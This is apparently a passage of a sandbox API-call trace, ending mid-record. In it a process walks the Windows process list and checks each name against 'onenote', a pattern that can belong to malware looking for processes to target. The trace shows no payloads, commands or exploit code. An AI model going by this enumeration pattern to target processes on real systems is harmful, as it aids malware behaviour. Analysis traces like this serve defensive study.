lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0097.958] StrStrIA (lpFirst="[System Process]", lpSrch="onenote") returned 0x0 [0097.958] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.959] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574e70 [0097.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574e70, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0097.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0097.959] StrStrIA (lpFirst="System", lpSrch="onenote") returned 0x0 [0097.959] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.961] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3579a40 [0097.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3579a40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0097.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0097.961] StrStrIA (lpFirst="smss.exe", lpSrch="onenote") returned 0x0 [0097.961] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.962] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x35798f0 [0097.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x35798f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0097.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0097.962] StrStrIA (lpFirst="csrss.exe", lpSrch="onenote") returned 0x0 [0097.962] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.963] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35799f8 [0097.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x35799f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0097.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0097.963] StrStrIA (lpFirst="wininit.exe", lpSrch="onenote") returned 0x0 [0097.963] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.965] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579938 [0097.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3579938, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0097.965] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0097.965] StrStrIA (lpFirst="csrss.exe", lpSrch="onenote") returned 0x0 [0097.965] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.966] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579a88 [0097.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3579a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0097.966] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0097.966] StrStrIA (lpFirst="winlogon.exe", lpSrch="onenote") returned 0x0 [0097.966] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0097.967] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3579968 [0097.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3579968, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0097.967] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0097.967] StrStrIA (lpFirst="services.exe", lpSrch="onenote") returned 0x0 [0097.967] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.968] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3579980 [0097.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3579980, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0097.969] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0097.969] StrStrIA (lpFirst="lsass.exe", lpSrch="onenote") returned 0x0 [0097.969] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.970] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579a28 [0097.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579a28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.970] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.970] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.970] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0097.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.974] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579ab8 [0097.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579ab8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0097.974] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0097.974] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="onenote") returned 0x0 [0097.974] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0097.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0097.976] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3579998 [0097.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3579998, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0097.976] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0097.976] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="onenote") returned 0x0 [0097.976] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.977] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35799b0 [0097.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35799b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.977] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.977] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.977] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0097.978] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574f10 [0097.978] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574f10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0097.978] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0097.978] StrStrIA (lpFirst="dwm.exe", lpSrch="onenote") returned 0x0 [0097.978] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.980] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579ad0 [0097.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579ad0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.980] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.980] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.980] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.981] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35799c8 [0097.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35799c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.981] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.981] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.981] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.982] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579b30 [0097.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579b30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.982] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.982] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.983] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.984] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x35799e0 [0097.984] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x35799e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.984] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.984] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.984] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.985] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579ae8 [0097.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579ae8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.986] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.986] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.986] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.987] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579b00 [0097.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579b00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.988] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.988] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.988] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.989] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579b18 [0097.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579b18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.989] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.989] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.989] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.991] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579d70 [0097.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579d70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.991] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.991] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.991] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.992] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579db8 [0097.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579db8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.992] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.992] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.993] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3579c68 [0097.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3579c68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0097.993] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0097.993] StrStrIA (lpFirst="svchost.exe", lpSrch="onenote") returned 0x0 [0097.993] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, 